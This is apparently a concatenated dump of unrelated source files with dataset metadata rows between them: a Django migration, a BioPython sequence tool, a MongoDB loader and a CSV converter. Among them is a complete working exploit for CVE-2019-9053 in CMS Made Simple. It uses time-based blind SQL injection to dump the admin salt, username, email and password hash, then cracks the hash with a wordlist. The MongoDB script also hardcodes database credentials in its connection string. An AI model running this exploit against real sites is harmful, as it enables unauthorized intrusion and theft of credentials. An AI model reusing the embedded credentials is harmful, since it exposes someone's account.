('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=150, null=True, verbose_name='Name')),
('email', models.EmailField(max_length=254, null=True, verbose_name='E-Mail')),
('kind_of_inquiry', models.CharField(choices=[('S', 'Solo Travel'), ('HG', 'Group Travel (Only Hunters)'), ('MG', 'Group Travel (Hunters/Non-Hunters)'), ('OT', 'Other')], max_length=2, null=True, verbose_name='Kind of Inquiry')),
('inquiry', ckeditor.fields.RichTextField(null=True, verbose_name='Travel Inquiry')),
('consent_to_be_contacted', models.BooleanField(default=False, verbose_name='Consent to be contacted')),
('date', models.DateTimeField(auto_now_add=True, verbose_name='Date of Inquiry')),
('status', models.BooleanField(default=True, verbose_name='Status')),
],
),
migrations.CreateModel(
name='Trip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('consent_to_travel_rules', models.BooleanField(default=False, verbose_name='Consent to Publishing Rules')),
('name', models.CharField(blank=True, max_length=150, null=True, verbose_name='Name')),
('country', django_countries.fields.CountryField(max_length=2, verbose_name='Country')),
('region', models.CharField(max_length=300, verbose_name='Region / Territory')),
('available_accommodation_types', jagdreisencheck.custom_fields.ListField(blank=True, null=True, verbose_name='Available Accommodations')),
('private_parking', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Private Parking')),
('airport_transfer', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Airport Transfer')),
('available_hunting_types', jagdreisencheck.custom_fields.ListField(verbose_name='Hunting Types')),
('rifle_rentals', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Rifle Rentals')),
('hunting_start_time', models.IntegerField(choices=[(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'), (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], default=5, verbose_name='Start of Season')),
('hunting_end_time', models.IntegerField(choices=[(1, 'January'), (2, 'February'), (3, 'March'), (4, 'April'), (5, 'May'), (6, 'June'), (7, 'July'), (8, 'August'), (9, 'September'), (10, 'October'), (11, 'November'), (12, 'December')], default=10, verbose_name='End of Season')),
('family_offers', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Family Offers')),
('alternative_activities', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Alternative Offers')),
('available_meal_options', jagdreisencheck.custom_fields.ListField(blank=True, null=True, verbose_name='Catering Options')),
('staff_languages', jagdreisencheck.custom_fields.ListField(verbose_name='Staff Languages')),
('interpreter_at_site', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Interpreting Service')),
('wireless_coverage', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Wireless Coverage')),
('broadband_internet', models.NullBooleanField(choices=[(False, 'No'), (True, 'Yes'), (None, 'Unknown')], default=None, verbose_name='Broadband Internet')),
('vendor_link', models.URLField(blank=True, null=True, verbose_name='Vendor Link')),
('description', ckeditor.fields.RichTextField(blank=True, max_length=8000, null=True, verbose_name='Trip Description')),
('featured', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Featured')),
('featured_start_date', models.DateTimeField(auto_now=True, null=True, verbose_name='Featuring Start')),
('featured_end_date', models.DateTimeField(blank=True, null=True, verbose_name='Featuring End')),
('sponsored', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Sponsored')),
('sponsored_start_date', models.DateTimeField(auto_now=True, null=True, verbose_name='Sponsoring Start')),
('sponsored_end_date', models.DateTimeField(blank=True, null=True, verbose_name='Sponsoring End')),
('reviewed', models.BooleanField(choices=[(False, 'No'), (True, 'Yes')], default=False, verbose_name='Reviewed')),
('overall_rating', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Overall Rating')),
('rating_economic', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Economic Rating')),
('rating_ecologic', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Ecologic Rating')),
('rating_sociocultural', models.DecimalField(decimal_places=4, max_digits=6, null=True, verbose_name='Socio-Cultural Rating')),
('slogan', models.CharField(blank=True, max_length=75, null=True, verbose_name='Slogan')),
('pub_date', models.DateTimeField(auto_now=True, verbose_name='Publication Date')),
('last_modified', models.DateTimeField(auto_now=True, null=True, verbose_name='Last Modified')),
('views', models.IntegerField(default=0, verbose_name='Views')),
('tech_name', models.CharField(max_length=30, null=True, verbose_name='Technical Name')),
('slug', models.SlugField(null=True, verbose_name='Absolute URL')),
('headline_image', models.ImageField(blank=True, null=True, upload_to='trips/headline_images/', verbose_name='Title Image')),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.CompanyName', verbose_name='Company')),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='creator', to=settings.AUTH_USER_MODEL, verbose_name='Creator')),
('game', models.ManyToManyField(to='travelling.Game', verbose_name='Game')),
('reviewed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='reviewer', to=settings.AUTH_USER_MODEL, verbose_name='Reviewed By')),
],
options={
'verbose_name': 'Trip',
'verbose_name_plural': 'Trips',
},
),
migrations.CreateModel(
name='TripBestOfModel',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='travelling_tripbestofmodel', serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(max_length=75, verbose_name='Name')),
('num_objects', models.IntegerField(default=10, verbose_name='Number of Entries')),
('set_featured', models.BooleanField(default=False, verbose_name='Show Featured Only')),
('set_sponsored', models.BooleanField(default=False, verbose_name='Show Sponsored Only')),
('template', models.CharField(choices=[('travelling/components/trip-thumbnail.html', 'Standard Template')], default='travelling/components/trip-thumbnail.html', max_length=300, verbose_name='Template')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='TripCarouselConfig',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='travelling_tripcarouselconfig', serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(max_length=75, verbose_name='Name')),
('application', models.CharField(max_length=75, verbose_name='Application')),
('model', models.CharField(max_length=75, verbose_name='Database Model')),
('num_objects', models.IntegerField(default=10, verbose_name='Number of Entries')),
('set_featured', models.BooleanField(default=False, verbose_name='Show Featured Only')),
('set_sponsored', models.BooleanField(default=False, verbose_name='Show Sponsored Only')),
('selection_criteria', models.CharField(blank=True, max_length=450, null=True, verbose_name='Selection Criteria')),
('template', models.CharField(choices=[('travelling/components/trip-thumbnail.html', 'Default Template')], max_length=300, verbose_name='Template')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='TripCatalogueModel',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='travelling_tripcataloguemodel', serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(max_length=75, verbose_name='Name')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='Trophy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weight', models.DecimalField(blank=True, decimal_places=4, max_digits=8, null=True, verbose_name='Weight (kg)')),
('length', models.DecimalField(blank=True, decimal_places=4, max_digits=8, null=True, verbose_name='Length (cm)')),
('cic_pt', models.DecimalField(blank=True, decimal_places=4, max_digits=8, null=True, verbose_name='CIC Points')),
('game', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.Game', verbose_name='Game')),
('rating', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='trophy_rating', to='travelling.Rating', verbose_name='Associated Rating')),
                ('trip', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Associated Trip')),
],
),
migrations.CreateModel(
name='AccommodationPriceList',
fields=[
('pricelist_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='travelling.PriceList')),
('name', models.CharField(max_length=75, verbose_name='Price list name')),
],
bases=('travelling.pricelist',),
),
migrations.CreateModel(
name='GamePriceList',
fields=[
('pricelist_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='travelling.PriceList')),
('name', models.CharField(max_length=75, verbose_name='Price list name')),
],
bases=('travelling.pricelist',),
),
migrations.AddField(
model_name='travelinquiry',
name='trip',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Trip'),
),
migrations.AddField(
model_name='travelinquiry',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.IndividualProfile', verbose_name='User'),
),
migrations.AddField(
model_name='rating',
name='trip',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Associated Trip'),
),
migrations.AddField(
model_name='rating',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Author'),
),
migrations.AddField(
model_name='pricelist',
name='last_modified_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Author'),
),
migrations.AddField(
model_name='pricelist',
name='trip',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='travelling.Trip', verbose_name='Associated Trip'),
),
migrations.AddField(
model_name='pricelist',
name='user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='inital_creator', to=settings.AUTH_USER_MODEL, verbose_name='Author'),
),
migrations.AddField(
model_name='gameprice',
name='price_list',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.PriceList', verbose_name='Associated Price List'),
),
migrations.AddField(
model_name='accommodationprice',
name='price_list',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='travelling.PriceList', verbose_name='Associated Price List'),
),
migrations.AlterUniqueTogether(
name='trip',
unique_together=set([('company', 'country', 'region')]),
),
migrations.AlterUniqueTogether(
name='rating',
unique_together=set([('user', 'trip')]),
),
]
| 83.473333
| 349
| 0.633376
| 24,682
| 0.985624
| 0
| 0
| 0
| 0
| 0
| 0
| 7,449
| 0.29746
|
49ce339e404139f63103f0e97e83fc72d1aded23
| 15,097
|
py
|
Python
|
bio2.py
|
phenolophthaleinum/BioPython
|
67be63e69f136134ca8cb41676700c97da7a2006
|
[
"MIT"
] | null | null | null |
bio2.py
|
phenolophthaleinum/BioPython
|
67be63e69f136134ca8cb41676700c97da7a2006
|
[
"MIT"
] | null | null | null |
bio2.py
|
phenolophthaleinum/BioPython
|
67be63e69f136134ca8cb41676700c97da7a2006
|
[
"MIT"
] | null | null | null |
from Bio.SeqIO import parse
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
from Bio.Alphabet import IUPAC, generic_dna
from Bio import Alphabet, Entrez
from Bio.SeqUtils import GC
from Bio.Blast import NCBIWWW, NCBIXML
from Bio import pairwise2
from Bio.pairwise2 import format_alignment
from Bio import motifs
__author__ = 'Maciej Michalczyk'
__version__ = '09122019'
class CurrentSession:
    def __init__(self, sequence = None, comp_seq = None, transcribed_seq = None,
                 translated_seq = None, id = None, name = None, desc = None, gc_perc = None,
                 record = None):
        # store the constructor arguments so a session can be pre-populated
        self.sequence = sequence
        self.comp_seq = comp_seq
        self.transcribed_seq = transcribed_seq
        self.translated_seq = translated_seq
        self.id = id
        self.name = name
        self.desc = desc
        self.gc_perc = gc_perc
        self.record = record if record is not None else SeqRecord(self.sequence, id = self.id)
        self.file_session = None
def openFile(self, filename):
file = open(filename + '.fasta')
self.file_session = str(filename + '.fasta')
return file
def closeFile(self, file_handle):
file_handle.close()
def getSequenceInfo(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.id = record.id
self.name = record.name
self.desc = record.description
self.sequence = Seq(str(record.seq), IUPAC.ambiguous_dna)
print("ID: {}".format(self.id))
print("Name: {}".format(self.name))
print("Description: {}".format(self.desc))
print("Sequence: {}".format(self.sequence))
# print("Complementary sequence: {}".format(sequence.complement()))
print("------------------------------------------------------------")
return
def getComplementarySequence(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_dna)
self.name = record.name
self.comp_seq = self.sequence.complement()
print("Name: {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True:
print("Sequence: {}".format(self.sequence))
print("Complementary sequence: {}".format(self.comp_seq))
print("------------------------------------------------------------")
else:
print("This sequence is not a DNA, can't get a complementary of that. Load correct sequence.")
return
def transcribeSequence(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_dna)
self.name = record.name
self.transcribed_seq = self.sequence.transcribe()
print("Name: {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True:
print("Sequence: {}".format(self.sequence))
print("Transcribed sequence: {}".format(self.transcribed_seq))
print("------------------------------------------------------------")
else:
print("This sequence is not a DNA, can't get a complementary of that. Load correct sequence.")
def translateSequence(self, file_handle, stop):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_rna)
self.name = record.name
print("Name: {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True and stop == 'y':
self.translated_seq = self.sequence.translate(to_stop=True)
print("Sequence: {}".format(self.sequence))
print("Translated sequence: {}".format(self.translated_seq))
print("------------------------------------------------------------")
elif Alphabet._verify_alphabet(self.sequence) == True and stop == 'n':
self.translated_seq = self.sequence.translate()
print("Sequence: {}".format(self.sequence))
print("Translated sequence: {}".format(self.translated_seq))
print("------------------------------------------------------------")
else:
print("This sequence is not a RNA, can't translate that. Load correct sequence.")
def get_GC_Content(self, file_handle):
records = parse(file_handle, "fasta")
for record in records:
self.sequence = Seq(str(record.seq), IUPAC.unambiguous_dna)
self.name = record.name
self.gc_perc = GC(self.sequence)
print("Name {}".format(self.name))
if Alphabet._verify_alphabet(self.sequence) == True:
print("Sequence: {}".format(self.sequence))
print("GC content: {}%".format(self.gc_perc))
print("------------------------------------------------------------")
else:
print("This sequence is not a DNA, only calculate GC content in DNA. Load correct sequence.")
def fetchRecord(self, db, accession):
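        # fetch a record from NCBI Entrez in FASTA format, save it as <record name>.fasta
        # and return the filename so it can be opened as the current session file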
Entrez.email = "A.N.Other@example.com"
handle = Entrez.efetch(db = db, id = accession, rettype = "fasta")
#print(handle.read())
record = SeqIO.read(handle, "fasta")
print(record)
filename = record.name
file = open(filename + ".fasta", "w")
SeqIO.write(record, file, "fasta")
return filename
def runBlast(self, type, database):
seq_record = next(SeqIO.parse(open(self.file_session), 'fasta'))
print("Requesting BLAST (might take a few minutes...)")
request_handle = NCBIWWW.qblast(type, database, seq_record.seq)
print("BLAST succeeded.")
with open("{}_blast.xml".format(self.file_session), "w") as save_f:
save_f.write(request_handle.read())
request_handle.close()
print("BLAST results saved.")
def alignPairwise(self, file_handle, alignment_type):
try:
records = parse(file_handle, "fasta")
number = 1
seq1 = None
seq2 = None
for record in records:
if number == 1:
seq1 = record.seq
elif number == 2:
seq2 = record.seq
number += 1
if seq2 is None:
print("Error: There is only one sequence in the file.")
return
if alignment_type == str(1):
alignments = pairwise2.align.globalxx(seq1, seq2)
elif alignment_type == str(2):
alignments = pairwise2.align.localxx(seq1, seq2)
elif alignment_type == str(3):
match = int(input("Define points given for match: "))
mismatch = int(input("Define points deduced for mismatch: "))
o_gap = int(input("Define penalty for gap opening: "))
ext_gap = int(input("Define penalty for gap extension: "))
alignments = pairwise2.align.globalms(seq1, seq2, match, mismatch,
o_gap, ext_gap)
for alignment in alignments:
print("RAW ALIGNMENT: ")
print(alignment)
print("FORMATTED ALIGNMENT: ")
print(format_alignment(*alignment))
except Exception as e1:
print("Error, problably there is only one sequence.")
def createMotif(self, file_handle):
records = parse(file_handle, "fasta")
logofile = self.file_session + "_logo.png"
seqs_motif = []
for record in records:
self.sequence = Seq(str(record.seq))
seqs_motif.append(self.sequence)
seqs = motifs.create(seqs_motif)
print(seqs.counts)
seqs.weblogo(logofile)
print("Weblogo saved.")
def getElems(self, length):
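        # generator yielding every substring of the loaded sequence with the given length,
        # sliding one base at a time (e.g. length 3 over "ATGCA" -> "ATG", "TGC", "GCA")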
for base in range(len(self.sequence)):
if base + length > len(self.sequence):
break
else:
yield self.sequence[base:base + length]
def saveActions(self):
if self.file_session != None:
with open("{}_actions.txt".format(self.id), "w") as save_f:
save_f.write("""ID: {}
NAME: {}
DESCRIPTION: {}
ORIGINAL SEQUENCE: {}
COMPLEMENTARY SEQUENCE: {}
TRANSCRIBED SEQUENCE: {}
TRANSLATED SEQUENCE: {}
G/C PERCENTAGE: {}%""".format(self.id, self.name, self.desc, self.sequence, self.comp_seq,
self.transcribed_seq, self.translated_seq, self.gc_perc))
save_f.close()
print("Your actions were saved!")
else:
print("Nothing to save, probably you haven't loaded any file before.")
# def convertFASTAtoGENBANK(self, filename):
# file = open(filename + ".fasta")
# record = SeqIO.read(file, "fasta")
# record.seq.alphabet = generic_dna
# file_genbank = open(filename + ".gbk", "w")
# SeqIO.write(record, file_genbank, "genbank")
# file_genbank.close()
# file.close()
if __name__ == '__main__':
session = CurrentSession()
while True:
print("""////Bio Python////
1. Load FASTA file
2. Load record info
3. Get complementary sequence
4. Transcribe sequence
5. Translate sequence
6. Get GC content
7. Fetch and load FASTA from Entrez
*8. Convert FASTA to GenBank
9. Run BLAST
    10. Perform pairwise alignment
11. Create motifs and weblogo
12. Save your actions made on FASTA file to txt file
13. Print sequence substrings
=== Current session file: {} ===
Type 'help' for help.
Type 'quit' to exit.""".format(session.file_session))
menu_pos = input('>>').lower()
if menu_pos == str(1):
try:
print("Type name of FASTA file to process: ")
filename = input()
file_handle = session.openFile(filename)
print("FASTA loaded!")
except Exception as e:
print("No such file or directory.")
elif menu_pos == str(2):
try:
file_handle = session.openFile(filename)
session.getSequenceInfo(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(3):
try:
file_handle = session.openFile(filename)
session.getComplementarySequence(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(4):
try:
file_handle = session.openFile(filename)
session.transcribeSequence(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(5):
stop = input('Stop translating at first stop codon? [y/n]').lower()
try:
file_handle = session.openFile(filename)
session.translateSequence(file_handle, stop)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(6):
try:
file_handle = session.openFile(filename)
session.get_GC_Content(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(7):
try:
db = input("Type database name: ").lower()
accession = input("Type accession to find: ")
filename = session.fetchRecord(db, accession)
file_handle = session.openFile(filename)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(8):
try:
print("Type name of FASTA file to process: ")
filename = input()
# session.convertFASTAtoGENBANK(filename)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(9):
try:
file_handle = session.openFile(filename)
type = input("Type the type of BLAST: ")
database = input("Type database name: ")
session.runBlast(type, database)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(10):
try:
print("""Choose type of aligment:
1. Global Pairwise (default parameters)
2. Local Pairwise (default parameters)
3. Global Pairwise with custom parameters""")
alignment_type = input('>>')
file_handle = session.openFile(filename)
session.alignPairwise(file_handle, alignment_type)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded.")
elif menu_pos == str(11):
try:
file_handle = session.openFile(filename)
session.createMotif(file_handle)
session.closeFile(file_handle)
except Exception as e:
print("File is not loaded")
elif menu_pos == str(12):
session.saveActions()
elif menu_pos == str(13):
try:
length = int(input("Length of substrings:"))
iterator = session.getElems(length)
print(session.sequence)
i = 0
for base in iterator:
print(' ' * i + base)
i += 1
print(' ' * i + next(iterator))
i += 1
except StopIteration:
pass
except Exception as e:
print("File is not loaded")
elif menu_pos == 'debug':
print("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(session.id, session.name,
session.desc,session.sequence,
session.comp_seq, session.transcribed_seq,
session.translated_seq, session.gc_perc))
elif menu_pos == 'quit':
break
elif menu_pos == 'help':
print("""
quickHELP:
        Most menu operations need a FASTA file to be opened first.
        Be patient while doing BLAST.
        Menu items marked with an asterisk are not usable yet.
Have fun!
""")
else:
print("Unknown command.")
| 39.111399
| 110
| 0.540703
| 8,601
| 0.569716
| 221
| 0.014639
| 0
| 0
| 0
| 0
| 3,739
| 0.247665
|
49cfbdd139a2858864f15766804aa976f1344306
| 6,456
|
py
|
Python
|
room/easyctf/exploit/46635.py
|
danieldavidson/tryhackme-ctf
|
f42362609ffb72151f7056371e6ad7207e42c8c5
|
[
"MIT"
] | null | null | null |
room/easyctf/exploit/46635.py
|
danieldavidson/tryhackme-ctf
|
f42362609ffb72151f7056371e6ad7207e42c8c5
|
[
"MIT"
] | null | null | null |
room/easyctf/exploit/46635.py
|
danieldavidson/tryhackme-ctf
|
f42362609ffb72151f7056371e6ad7207e42c8c5
|
[
"MIT"
] | 1
|
2022-03-11T22:55:33.000Z
|
2022-03-11T22:55:33.000Z
|
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print "[+] Specify an url target"
print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
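# Each dump_* routine below recovers one field character by character: a candidate
# character is appended, the known prefix is hex-encoded into a LIKE pattern, and the
# request is timed -- a response slower than TIME seconds means the guess was correct
# (time-based blind SQL injection).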
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist)
for line in dict.readlines():
line = line.replace("\n", "")
beautify_print_try(line)
if hashlib.md5(str(salt) + line).hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print "\033c"
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print "\033c"
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print colored("[*] Now try to crack password")
crack_password()
beautify_print()
| 34.709677
| 189
| 0.586431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,721
| 0.266574
|
49d510eb8a62e95ceab2defdd45b0de37d252639
| 968
|
py
|
Python
|
module3-nosql-and-document-oriented-databases/rpg_mongo.py
|
Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases
|
f78bb4c67a182dd3c96ffdca1175d888239f2099
|
[
"MIT"
] | null | null | null |
module3-nosql-and-document-oriented-databases/rpg_mongo.py
|
Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases
|
f78bb4c67a182dd3c96ffdca1175d888239f2099
|
[
"MIT"
] | null | null | null |
module3-nosql-and-document-oriented-databases/rpg_mongo.py
|
Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases
|
f78bb4c67a182dd3c96ffdca1175d888239f2099
|
[
"MIT"
] | null | null | null |
import json
import pymongo
client = pymongo.MongoClient('mongodb://dakotapope:passwrd@'
                             'cluster0-shard-00-00-iaoct.mongodb.net:27017,cluster0-shard-00'
                             '-01-iaoct.mongodb.net:27017,cluster0-shard-00-02-iaoct.mongodb.'
                             'net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource='
                             'admin&retryWrites=true')  # implicit concatenation keeps the URI free of newlines
# investigate the databases already initialized
client.database_names()
# -->['rpg_data', 'test', 'admin', 'local']
# since I created the table on the Mongo Atlas dashboard I will use it here
rpgs = client.rpg_data.rpg
# load the json file to prep for dumping into a mongo db table
with open('C:/Users/dakot/Documents/GitHub/DS-Unit-3-Sprint-2-SQL-and-'
          'Databases/module3-nosql-and-document-oriented-databases/rpg.json') as f:
file_data = json.load(f)
# make a space for the data to go
rpg_table = rpgs
# Dump the json data into the mongodb cloud.
rpg_table.insert_many(file_data)
# <pymongo.results.InsertManyResult at 0x2c80a7c8688>
# And DONE!
| 34.571429
| 74
| 0.764463
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 759
| 0.784091
|
49d5165d59fc22ca8bcab148e06413fa005d535e
| 2,799
|
py
|
Python
|
convertPP.py
|
Harry93x/FinancialToolbox
|
d34ef96d66b7447332d8f977da8fa9abc43cc981
|
[
"MIT"
] | null | null | null |
convertPP.py
|
Harry93x/FinancialToolbox
|
d34ef96d66b7447332d8f977da8fa9abc43cc981
|
[
"MIT"
] | null | null | null |
convertPP.py
|
Harry93x/FinancialToolbox
|
d34ef96d66b7447332d8f977da8fa9abc43cc981
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import xlrd
import csv
import sys
import getopt
# input configuration
iColDate = 0
iColTransactionType = 1
iColAmount = 3
iColDescription = 6
transactionType = 'Repayment'
descriptionType = 'Interest'
#output configuration
outHeader = ['Datum', 'Typ', 'Wert']
outType = 'Zinsen'
outDelimiter = ';'
def localize_floats(row):
return [
str(el).replace('.', ',') if isinstance(el, float) else el
for el in row
]
def main(argv):
inputfile = ''
outputfile = ''
try:
